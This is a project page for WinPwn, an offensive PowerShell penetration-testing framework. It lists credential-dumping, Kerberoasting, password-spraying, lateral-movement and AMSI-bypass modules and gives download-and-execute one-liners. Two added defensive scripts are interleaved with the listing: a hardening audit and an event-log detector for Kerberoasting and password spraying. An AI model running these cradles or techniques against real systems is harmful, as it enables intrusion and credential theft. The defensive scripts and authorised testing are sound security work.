WinPwn – Automation For Internal Windows Penetrationtest / AD-Security

In many previous internal penetration tests I repeatedly had problems with the existing PowerShell recon / exploitation scripts because of missing proxy support. I also kept running the same scripts one after the other to get information about the current system and/or the domain. To automate as many internal penetration test steps as possible (reconnaissance as well as exploitation), and to solve the proxy problem, I wrote my own script with automatic proxy detection and integration. The script is mostly based on well-known offensive security PowerShell projects. They are loaded into RAM via IEX DownloadString.
Any suggestions, feedback, pull requests and comments are welcome!
Just import the modules with: Import-Module .\WinPwn.ps1 or iex (new-object net.webclient).downloadstring('')
For an AMSI bypass use the following one-liner: iex (new-object net.webclient).downloadstring('')
If you find yourself stuck on a Windows system without internet access, no problem at all, just use Offline_Winpwn.ps1; all scripts and executables are included.
Invoke-Mimikatz version

  • Safetykatz in memory
  • Dump lsass using the rundll32 technique
  • Download and run Lazagne
  • Dump browser credentials
  • Extract juicy information from memory
  • Exfiltrate Wifi credentials
  • Dump SAM file NTLM hashes
  • localreconmodules ->

    • Collect installed software, vulnerable software, shares, network information, groups, privileges and much more
    • Check typical vulns like SMB signing, LLMNR poisoning, MITM6, WSUS over HTTP
    • Check the PowerShell event logs for credentials or other sensitive information
    • Search for passwords in the registry and on the file system
    • Find sensitive files (config files, RDP files, KeePass databases)
    • Search for .NET binaries on the local system
    • Optional: Get-Computerdetails (Powersploit) and PSRecon
  • domainreconmodules ->

    • Collect various domain information for manual review
    • Find AD passwords in description fields
    • Search for potentially sensitive domain share files
    • ACL analysis
    • Unconstrained delegation systems/users are enumerated
    • MS17-10 scanner for domain systems
    • SQL Server discovery and auditing functions (default credentials, passwords in the database and more)
    • MS-RPRN check for domain controllers
    • Group Policy audit with Grouper2
    • An AD report is generated as CSV files (or XLS if Excel is installed) with ADRecon.
  • Privescmodules -> Executes different privesc scripts in memory (PowerUp Allchecks, Sherlock, GPPPasswords)
  • latmov -> Searches for systems with admin access in the domain for lateral movement. Mass-Mimikatz can be used afterwards on the found systems
  • shareenumeration -> Invoke-Filefinder and Invoke-Sharefinder (Powerview / Powersploit)
  • groupsearch -> Get-DomainGPOUserLocalGroupMapping – find systems where you have admin access or RDP access via Group Policy mapping (Powerview / Powersploit)
  • Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking
  • powerSQL -> SQL Server discovery, check access with the current user, audit for default credentials + UNC path injection attacks
  • Sharphound -> Downloads Sharphound and collects information for the Bloodhound DB
  • adidnswildcard -> Create an Active Directory-integrated DNS wildcard record
  • MS17-10 -> Scan active Windows servers in the domain or all systems for the MS17-10 (Eternalblue) vulnerability
  • Sharpcradle -> Load C# files from a remote web server into RAM
  • DomainPassSpray -> DomainPasswordSpray attacks, one password for all domain users
  • TO-DO

    • Some obfuscation
    • More obfuscation
    • Proxy via PAC file support
    • Get the scripts from my own creds repository () to be independent from changes in the original repositories
    • More recon/exploitation functions
    • Add MS17-10 scanner
    • Add menu for better handling of functions
    • AMSI bypass
    • Mailsniper integration
    • Azure checks / modules integration
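The localreconmodules above flag SMB signing, LLMNR, MITM6 and WSUS-over-HTTP as "typical vulns", and note that PowerShell event logs can leak credentials. The following script is an added example, not part of WinPwn, that audits the same settings from the defender's side: it is read-only, changes nothing, and reports the hardened value for each check. The registry paths are the documented policy/service locations; the check names, the pass criteria and the suggested fixes are this example's own.

```powershell
# Added example (not WinPwn code): read-only audit of the host settings that
# WinPwn's localreconmodules enumerate. Run locally as an administrator.

function Get-RegValue {
    # Returns a registry value, or $null when the key/value is absent (= default behaviour)
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function Test-HostHardening {
    $findings = @()

    # SMB signing, server and client side: 1 = required, 0/absent = negotiable (relayable)
    foreach ($svc in 'LanmanServer', 'LanmanWorkstation') {
        $v = Get-RegValue "HKLM:\SYSTEM\CurrentControlSet\Services\$svc\Parameters" 'RequireSecuritySignature'
        $findings += [pscustomobject]@{
            Check = "SMB signing required ($svc)"
            Value = $v
            Pass  = ($v -eq 1)
            Fix   = 'GPO: "Microsoft network server/client: Digitally sign communications (always)" = Enabled'
        }
    }

    # LLMNR: EnableMulticast = 0 under the DNSClient policy key disables it
    $v = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient' 'EnableMulticast'
    $findings += [pscustomobject]@{
        Check = 'LLMNR disabled'; Value = $v; Pass = ($v -eq 0)
        Fix   = 'GPO: "Turn off multicast name resolution" = Enabled'
    }

    # WSUS over HTTP: an http:// WUServer lets an on-path attacker serve "updates"
    $v = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate' 'WUServer'
    $findings += [pscustomobject]@{
        Check = 'WSUS server uses HTTPS (or no WSUS configured)'; Value = $v
        Pass  = ($null -eq $v) -or ($v -like 'https://*')
        Fix   = 'Point WUServer/WUStatusServer at an https:// URL'
    }

    # MITM6-style takeover needs IPv6 + DHCPv6 on interfaces where IPv6 is not really used
    $v6 = Get-NetAdapterBinding -ComponentID ms_tcpip6 -ErrorAction SilentlyContinue |
          Where-Object Enabled | Select-Object -ExpandProperty Name
    $findings += [pscustomobject]@{
        Check = 'IPv6 unbound on adapters where it is unused (review)'; Value = ($v6 -join ', ')
        Pass  = (@($v6).Count -eq 0)
        Fix   = 'If IPv6 is unused, unbind ms_tcpip6 or block inbound DHCPv6 (UDP 546/547) by firewall rule'
    }

    # PowerShell logging: script block logging should be on, and protected event logging
    # should encrypt the log entries so that secrets passed on command lines are not
    # readable by everyone who can read the event log
    $sbl = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' 'EnableScriptBlockLogging'
    $pel = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging' 'EnableProtectedEventLogging'
    $findings += [pscustomobject]@{
        Check = 'Script block logging enabled'; Value = $sbl; Pass = ($sbl -eq 1)
        Fix   = 'GPO: "Turn on PowerShell Script Block Logging" = Enabled'
    }
    $findings += [pscustomobject]@{
        Check = 'Protected event logging enabled'; Value = $pel; Pass = ($pel -eq 1)
        Fix   = 'GPO: "Enable Protected Event Logging" with an encryption certificate'
    }

    $findings
}

# Usage: print the table, then list only the failed checks
$results = Test-HostHardening
$results | Format-Table Check, Value, Pass -AutoSize
$results | Where-Object { -not $_.Pass } | Select-Object Check, Fix
```

Treat the IPv6 row as a review item rather than a hard failure: on a network that actually uses IPv6 the right mitigation is RA guard / DHCPv6 filtering on the switch, not unbinding the stack. The remaining rows map one-to-one onto the WinPwn checks, so a host that passes them all gives the corresponding modules nothing to find.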


    • Kevin-Robertson – Inveigh, Powermad, Invoke-TheHash
    • Arvanaghi – SessionGopher
    • PowerShellMafia – Powersploit
    • Dionach – PassHunt
    • A-mIn3 – WINSpect
    • 411Hall – JAWS
    • sense-of-security – ADrecon
    • dafthack – DomainPasswordSpray
    • rasta-mouse – Sherlock
    • AlessandroZ – LaZagne
    • samratashok – nishang
    • leechristensen – Random Repo
    • HarmJ0y – Many good blog posts, Gists and scripts
    • NETSPI – PowerUpSQL
    • Cn33liz – p0wnedShell
    • rasta-mouse – AmsiScanBufferBypass
    • l0ss – Grouper2
    • enjoiz – PrivEsc
    Download WinPwn
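The Kerberoasting and DomainPassSpray modules listed above both leave a characteristic trace on the domain controller's Security log: a burst of RC4 (0x17) service ticket requests (event 4769) from one account, and a burst of failed logons (event 4625) from one source against many different accounts. The script below is an added example that is not part of WinPwn; it implements that detection logic over flattened event objects. The EventData field names (TargetUserName, ServiceName, TicketEncryptionType, IpAddress) are those of events 4769 and 4625; the thresholds, the helper names and the sample events are this example's own.

```powershell
# Added example (not WinPwn code): detect Kerberoasting and password-spray patterns
# in Security log events 4769 / 4625, with constructed sample data for offline use.

function ConvertFrom-SecurityEvent {
    # Flatten a Get-WinEvent record into an object whose properties are the EventData names
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml = [xml]$Event.ToXml()
    $h = @{ Id = $Event.Id; Time = $Event.TimeCreated }
    foreach ($d in $xml.Event.EventData.Data) { $h[$d.Name] = $d.'#text' }
    [pscustomobject]$h
}

function Find-KerberoastPattern {
    # One account requesting many distinct RC4 service tickets within a short window.
    # 0x17 is legitimate for legacy services, so baseline before alerting on it.
    param([object[]]$Events, [int]$MinDistinctServices = 5, [int]$WindowMinutes = 10)
    $Events | Where-Object { $_.Id -eq 4769 -and $_.TicketEncryptionType -eq '0x17' } |
        Group-Object TargetUserName | ForEach-Object {
            $sorted   = $_.Group | Sort-Object Time
            $span     = ($sorted[-1].Time - $sorted[0].Time).TotalMinutes
            $services = @($sorted | Select-Object -ExpandProperty ServiceName -Unique).Count
            if ($services -ge $MinDistinctServices -and $span -le $WindowMinutes) {
                [pscustomobject]@{
                    Technique = 'Kerberoasting'; Account = $_.Name
                    DistinctServices = $services; Source = $sorted[0].IpAddress
                }
            }
        }
}

function Find-PasswordSprayPattern {
    # One source IP failing logons against many distinct accounts within a short window
    param([object[]]$Events, [int]$MinDistinctUsers = 10, [int]$WindowMinutes = 30)
    $Events | Where-Object { $_.Id -eq 4625 } | Group-Object IpAddress | ForEach-Object {
        $sorted = $_.Group | Sort-Object Time
        $span   = ($sorted[-1].Time - $sorted[0].Time).TotalMinutes
        $users  = @($sorted | Select-Object -ExpandProperty TargetUserName -Unique).Count
        if ($users -ge $MinDistinctUsers -and $span -le $WindowMinutes) {
            [pscustomobject]@{
                Technique = 'PasswordSpray'; Source = $_.Name
                DistinctUsers = $users; Attempts = $sorted.Count
            }
        }
    }
}

# Live use on a domain controller (needs permission to read the Security log):
#   $ev = Get-WinEvent -FilterHashtable @{ LogName='Security'; Id=4769,4625; StartTime=(Get-Date).AddHours(-1) } |
#         ForEach-Object { ConvertFrom-SecurityEvent $_ }
#   Find-KerberoastPattern $ev; Find-PasswordSprayPattern $ev

# Constructed sample events (not real log data) so both detectors can be exercised offline
$t0 = Get-Date '2024-01-01 10:00:00'
$sample = @()
1..6 | ForEach-Object {
    $sample += [pscustomobject]@{
        Id = 4769; Time = $t0.AddSeconds($_); TargetUserName = 'jdoe@CORP.LOCAL'
        ServiceName = "svc$_"; TicketEncryptionType = '0x17'; IpAddress = '::ffff:10.0.0.5'
    }
}
1..12 | ForEach-Object {
    $sample += [pscustomobject]@{
        Id = 4625; Time = $t0.AddSeconds($_ * 2); TargetUserName = "user$_"; IpAddress = '10.0.0.9'
    }
}
Find-KerberoastPattern  -Events $sample   # jdoe@CORP.LOCAL, 6 distinct services
Find-PasswordSprayPattern -Events $sample # 10.0.0.9, 12 distinct users
```

Both detectors key on distinct counts inside a time window rather than on raw volume, which is what separates these patterns from a busy service account or a user mistyping one password. Tune the thresholds against a week of your own 4769/4625 data before turning them into alerts.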